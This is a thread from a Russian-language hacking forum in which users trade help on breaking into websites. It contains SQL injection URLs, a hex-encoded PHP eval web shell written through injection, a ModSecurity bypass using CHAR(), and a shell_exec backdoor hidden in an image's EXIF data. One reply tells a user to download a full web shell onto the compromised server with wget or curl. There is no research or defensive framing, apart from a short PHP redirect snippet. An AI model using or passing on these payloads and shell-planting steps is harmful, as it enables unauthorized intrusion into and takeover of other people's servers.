ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.08.2014, 12:06
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651
Репутация:
-5
|
|
Сообщение от winstrool
winstrool said:
сам шелл нужно хексить
Захексил, выполнил запрос и вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1
Такое ощущение что какоето ограничение на кол-во символов в запросе
|
|
|
21.08.2014, 12:40
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Захексил, выполнил запрос и вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1
Такое ощущение что какоето ограничение на кол-во символов в запросе
Такое ощущение, что нужно угадывать, что именно вы там делаете, давайте урл посмотрим, иначе курите мануалы!
|
|
|
|
21.08.2014, 16:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Привет!
Делаю запрос
site.ru/index.php?id=-14+union+select+file_priv,2+from+mysql.user+where+ user='root'
На что выдает
Y Unknown column 'id' in 'where clause'
Далее пытаюсь залить шелл
На что выдает
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select '',2 from mysql.user in' at line 1
Как правильно составить запрос, чтобы не выскакивала ошибка?
Сообщение от None
Захексил, выполнил запрос и вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1
Такое ощущение, что вы копируете сюда не те запросы, которые выполняете.
По первому:
1) У рута file_priv есть по умолчанию.
2) Колонки id в mysql.user нет.
3) Если запрос таки правильный, вставьте комментарий в конец.
По второму:
1) Действительно, копируйте запрос.
2) Если ограничение на длину, проверьте простым вписыванием длинной строки в хексе.
3) Ошибка синтаксиса - это все еще ошибка синтаксиса. Начните с запроса, который выполняется корректно, а потом доводите до шелла.
|
|
|
|
21.08.2014, 19:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Привет
вопрос по MSSQL2000 with error:
....../xyz.asp?param=99%27
Код:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '99'' to a column of data type int.
Но
....../xyz.asp?param=99%20AND%201=1
возвращает
Код:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '99 and 1=1' to a column of data type int.
можно что-то сделать? или тут не сможем повлиять на исполнение запроса? |
|
|
|
21.08.2014, 22:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
755326
Репутация:
99
|
|
на некоторых сайтах когда проверяешь на sql инъекцию то идёт редирект, как это реализуется на php ?
|
|
|
|
21.08.2014, 22:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от GAiN
GAiN said:
на некоторых сайтах когда проверяешь на sql инъекцию то идёт редирект, как это реализуется на php ?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: /'[/COLOR][COLOR="#007700"]);
exit;
}
[/COLOR][/COLOR]
|
|
|
|
22.08.2014, 14:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
20084
Репутация:
0
|
|
есть скуля.
1.подбирал кол-во полей - 18
Код:
Code:
site.com/index.php?id=15+order+by+18+--+
2.Пытаюсь узнать принтабельное поле
Код:
Code:
site.com/index.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
3. срабатывает mod security. "select" загоняю в char
Код:
Code:
site.com/index.php?id=15+union+CHAR(115, 101, 108, 101, 99, 116)+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
возращает такую ошибку:
Сообщение от None
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /***/****public_html/xjax/xjax.php on line 227
No Products Found
что с этим делать? |
|
|
|
22.08.2014, 15:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от erwap
erwap said:
что с этим делать?
гуглить "mod_security bypass"
|
|
|
|
24.08.2014, 03:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
2413
Репутация:
0
|
|
долго я искал возможность через админку залить шелл wso2.php, но никак не получалось, всеми правдами и не правдами к полвторому ночи у меня получилось следующее: имеется файл вида site.com/shell.jpg.php5?r0ng=ls , где shell.jpg - это белый квадрат с поредактированными данными EXIF , где живёт код
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]shell_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"r0ng"[/COLOR][COLOR="#007700"]]);}[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
..
Вопрос в том, как залить полноценный шелл имя вот эти входные данные, подскажите, пожалуйста |
|
|
|
24.08.2014, 08:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от FieryDragon
FieryDragon said:
долго я искал возможность через админку залить шелл wso2.php, но никак не получалось, всеми правдами и не правдами к полвторому ночи у меня получилось следующее: имеется файл вида site.com/shell.jpg.php5?r0ng=ls , где shell.jpg - это белый квадрат с поредактированными данными EXIF , где живёт код
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]shell_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"r0ng"[/COLOR][COLOR="#007700"]]);}[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
..
Вопрос в том, как залить полноценный шелл имя вот эти входные данные, подскажите, пожалуйста Вы таки не поверите, но wget -O s.php http://site/shell.ext. Или curl. Или что угодно подобное.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
